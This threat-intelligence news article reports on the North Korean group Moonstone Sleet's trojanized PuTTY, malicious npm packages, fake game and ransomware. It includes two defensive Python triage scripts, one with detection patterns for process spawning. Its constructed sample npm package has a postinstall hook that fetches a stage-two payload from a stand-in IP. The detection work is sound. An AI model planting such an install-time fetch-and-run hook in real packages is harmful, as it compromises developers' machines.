Moonstone Sleet: a new North Korean hacker group

A never-before-seen North Korean threat actor codenamed Moonstone Sleet has been attributed as being behind cyber attacks targeting individuals and organizations in the software and information technology, education, and defense industrial base sectors, using ransomware and bespoke malware previously associated with the infamous Lazarus Group.

"Moonstone Sleet was observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a malicious game, and deliver a new custom ransomware," the Microsoft Threat Intelligence team said in a new analysis.

It also characterized the threat actor as combining tried-and-true techniques used by other North Korean threat actors with unique attack methodologies to achieve its strategic objectives.

The adversary, previously tracked by Redmond under the emerging cluster moniker Storm-1789, is assessed to be a state-aligned group that initially showed strong technical and operational overlap with the Lazarus Group (aka Diamond Sleet) before establishing its own distinct identity through separate infrastructure and tradecraft.

Similarities with Lazarus include extensive reuse of code from known malware such as Comebacker, which was first observed in January 2021 in connection with a campaign targeting security researchers working on vulnerability research and development.

Comebacker was put to use by the Lazarus Group as recently as this February, embedded inside seemingly innocuous Python and npm packages that connect to a command-and-control (C2) server to retrieve additional payloads.


To support its diverse goals, Moonstone Sleet has also been known to pursue software development positions at multiple legitimate companies, possibly to generate illicit revenue or to gain covert access to organizations on behalf of the sanctioned country.

Attack chains observed in August 2023 involved the use of a modified version of PuTTY, a tactic also adopted by the Lazarus Group in late 2022 as part of Operation Dream Job, with the lure delivered through LinkedIn and Telegram as well as developer freelancing platforms.

"Often, the actor sent targets a .ZIP archive containing two files: putty.exe, which was trojanized, and url.txt, which contained an IP address and a password," Microsoft said. "If the supplied IP and password were entered by the user into the PuTTY application, the application would decrypt the embedded payload, then load and execute it."

The trojanized PuTTY executable is designed to drop a custom installer dubbed SplitLoader, which in turn launches a series of intermediate stages culminating in a Trojan loader that is responsible for executing a portable executable received from the C2 server.
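The lure described above has a recognizable shape: a ZIP archive holding a putty.exe and a url.txt with an IP address and a password. The following triage script is an added example (not Microsoft's or the article's code) that checks an archive for that shape and compares the bundled putty.exe against an analyst-supplied allowlist of known-good SHA-256 hashes. The url.txt layout, the sample archive and the (empty) allowlist are assumptions constructed for the demo; in practice the allowlist is populated from official PuTTY releases you have verified yourself.

```python
"""Added example (not Microsoft's or the article's code): triage a ZIP
archive for the lure pattern of putty.exe bundled with a url.txt carrying
an IP address and a password, and check putty.exe against a known-good
hash allowlist. The url.txt layout and the allowlist are assumptions."""
import hashlib
import io
import ipaddress
import re
import zipfile

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
LABEL_TOKENS = {"ip", "host", "password", "pass", "pw"}  # assumed labels


def parse_url_txt(text: str):
    """Return (ip, password) if the text holds a valid IPv4 address plus at
    least one other non-label token (assumed to be the password), else None."""
    ip = None
    for cand in IPV4_RE.findall(text):
        try:
            ipaddress.IPv4Address(cand)
            ip = cand
            break
        except ValueError:
            continue  # e.g. 999.1.1.1 looks like an address but is not one
    if ip is None:
        return None
    rest = [tok for tok in re.split(r"[\s:/,;|=]+", text)
            if tok and tok != ip and tok.lower() not in LABEL_TOKENS]
    if not rest:
        return None
    return ip, rest[0]


def triage_zip(zip_bytes: bytes, known_good_sha256: set) -> dict:
    """Inspect an archive and report whether it matches the lure pattern."""
    findings = {"lure_pattern": False, "putty_sha256": None,
                "putty_known_good": None, "c2": None, "members": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = {n.lower(): n for n in zf.namelist()}
        findings["members"] = sorted(names.values())
        putty = names.get("putty.exe")
        url_txt = names.get("url.txt")
        if putty:
            digest = hashlib.sha256(zf.read(putty)).hexdigest()
            findings["putty_sha256"] = digest
            findings["putty_known_good"] = digest in known_good_sha256
        if url_txt:
            parsed = parse_url_txt(zf.read(url_txt).decode("utf-8", "replace"))
            if parsed:
                findings["c2"] = {"ip": parsed[0], "password": parsed[1]}
        # Both pieces present and url.txt parses: treat as the lure pattern,
        # regardless of whether the binary hash is known.
        findings["lure_pattern"] = bool(putty and findings["c2"])
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: a stand-in putty.exe (not a real PE) plus url.txt."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("putty.exe", b"MZ-stand-in-binary-for-the-demo")
        zf.writestr("url.txt", "203.0.113.10\nPassword: Hunter2!\n")  # constructed
    return buf.getvalue()


if __name__ == "__main__":
    # Empty allowlist here; a real one holds hashes of verified PuTTY builds.
    print(triage_zip(build_sample_zip(), known_good_sha256=set()))
```

A hit on `lure_pattern` with `putty_known_good` false is the combination worth escalating: a legitimate PuTTY download never ships alongside a credentials file, and an unknown hash means the binary is not one you have vetted.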

An alternative attack sequence involves the use of malicious npm packages delivered via LinkedIn or freelancing websites, often with the actor posing as a fake company that sends ZIP files under the guise of a technical skills assessment.

These npm packages are configured to connect to an actor-controlled IP address and drop payloads similar to SplitLoader, or to facilitate credential theft from the Windows Local Security Authority Subsystem Service (LSASS) process.
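Two traits of the packages just described can be checked offline before `npm install` ever runs: install-time lifecycle scripts, and source code that reaches out to a hard-coded IP address or spawns processes. The script below is an added example (not Microsoft's, Unit 42's or the article's code) that audits a package's extracted contents for those traits. The sample package, its name and the 203.0.113.10 endpoint are constructed for the demo; the risk scoring is a simple heuristic, not a signature for this actor.

```python
"""Added example (not Microsoft's or the article's code): audit an npm
package's contents, as extracted in a sandbox, for install-time lifecycle
scripts, hard-coded raw-IP endpoints and process spawning. The sample
package below is constructed for the demo."""
import ipaddress
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Literal scheme://A.B.C.D[:port] inside source; the host is validated below.
RAW_IP_URL_RE = re.compile(
    r"(?:https?|wss?|tcp)://((?:\d{1,3}\.){3}\d{1,3})(?::\d+)?")
SPAWN_RE = re.compile(
    r"\b(?:child_process|execSync|spawn(?:Sync)?|exec(?:File)?)\b")


def _is_flaggable_ip(text: str) -> bool:
    """True for a syntactically valid, non-loopback IPv4 literal."""
    try:
        return not ipaddress.IPv4Address(text).is_loopback
    except ValueError:
        return False


def audit_package(files: dict) -> dict:
    """files maps a path inside the package to its text content."""
    report = {"lifecycle_scripts": {}, "raw_ip_endpoints": [],
              "spawns": [], "risk": "low"}
    manifest = json.loads(files.get("package.json", "{}"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            report["lifecycle_scripts"][hook] = cmd
    for path, content in files.items():
        if not path.endswith((".js", ".cjs", ".mjs", ".json")):
            continue
        for m in RAW_IP_URL_RE.finditer(content):
            if _is_flaggable_ip(m.group(1)):
                report["raw_ip_endpoints"].append(
                    {"file": path, "url": m.group(0)})
        if path != "package.json" and SPAWN_RE.search(content):
            report["spawns"].append(path)
    # Heuristic: one trait alone is common in benign packages (build steps,
    # local dev servers); the combination is what warrants a closer look.
    hits = sum(bool(v) for v in (report["lifecycle_scripts"],
                                 report["raw_ip_endpoints"],
                                 report["spawns"]))
    report["risk"] = {0: "low", 1: "medium"}.get(hits, "high")
    return report


# Constructed sample mimicking a "skills assessment" package, not a real one.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "skills-assessment-task",
        "version": "1.0.0",
        "scripts": {"postinstall": "node lib/setup.js", "test": "jest"},
    }),
    "lib/setup.js": (
        "const http = require('http');\n"
        "const { execSync } = require('child_process');\n"
        "http.get('http://203.0.113.10:8080/stage2', res => {\n"
        "  /* write the response to disk and run it */\n"
        "});\n"
    ),
    "lib/index.js": "module.exports = (a, b) => a + b;\n",
}

if __name__ == "__main__":
    print(json.dumps(audit_package(SAMPLE_PACKAGE), indent=2))
```

Running this against a tarball fetched with `npm pack` (and never `npm install`) gives a first pass before any code executes; `npm install --ignore-scripts` is the complementary control when a package must be installed for inspection.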

It's worth noting that the targeting of npm developers with bogus packages is linked to a campaign previously documented by Palo Alto Networks Unit 42 as Contagious Interview (aka DEV#POPPER). Microsoft tracks that activity as Storm-1877.

Michael Sikorski, vice president and CTO of Unit 42, told The Hacker News that they are still analyzing the overlaps, but noted that there is no "direct overlap" between Moonstone Sleet and Contagious Interview.

Rogue npm packages have also been a malware delivery vector for another North Korea-linked group codenamed Jade Sleet (aka TraderTraitor and UNC4899), which was involved in the JumpCloud hack last year.

Other attacks discovered by Microsoft since February 2024 have used a malicious tank game called DeTankWar (aka DeFiTankWar, DeTankZone, and TankWarsZone) that was distributed to targets via email or messaging platforms, with fake accounts on X (formerly Twitter) providing a veneer of legitimacy.

"Moonstone Sleet typically reaches its targets through messaging platforms or email, presenting itself as a game developer seeking investment or developer support, and either masquerading as a legitimate blockchain company or using fake companies," Microsoft researchers said.

"Moonstone Sleet used a fake company called CC Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the game included in the body of the message."

The game itself ("delfi-tank-unity.exe") comes fitted with a malware loader called YouieLoad, which is capable of loading next-stage payloads into memory and creating malicious services that perform network and user discovery and browser data collection.


Another non-existent company – complete with custom domains, fake employee personas, and social media accounts – created by Moonstone Sleet for its social engineering campaigns is StarGlow Ventures, which, masquerading as a legitimate software development company, reached out to potential targets for collaboration on projects related to web apps, mobile apps, blockchain and AI.

Although the end goal of the campaign, which ran from January to April 2024, is unclear, the fact that the email messages were embedded with a tracking pixel raises the possibility that it was used as part of a trust-building exercise to identify which recipients engaged with the emails, for future revenue-generation opportunities.

The latest addition to the adversary's arsenal is a custom ransomware variant called FakePenny, which was deployed against an unnamed defense technology company in April 2024 with a ransom demand of $6.6 million in Bitcoin.

The use of ransomware is another tactic straight out of the Andariel (aka Onyx Sleet) playbook, a sub-group operating under the Lazarus umbrella that is known for its ransomware families H0lyGh0st and Maui.

In addition to adopting the necessary security measures to defend against the threat actor's attacks, Redmond is urging software companies to be on the lookout for supply chain attacks, given the propensity of North Korean hacking groups to poison software supply chains in order to carry out widespread malicious activity.

"Moonstone Sleet's diverse set of tactics is notable not only because of their effectiveness, but because of how they have evolved from those of several other North Korean threat actors over many years of activity to meet North Korea's cyber objectives," the company said.

The revelation comes as South Korea accused its northern neighbor's Lazarus Group of stealing 1,014 gigabytes of data and documents, including names, resident registration numbers and financial records, from its court computer network between January 7, 2021 and February 9, 2023, Korea JoongAng Daily reported earlier this month.

(The story was updated after publication on June 1, 2024, to include a comment from Palo Alto Networks Unit 42 about Contagious Interview.)
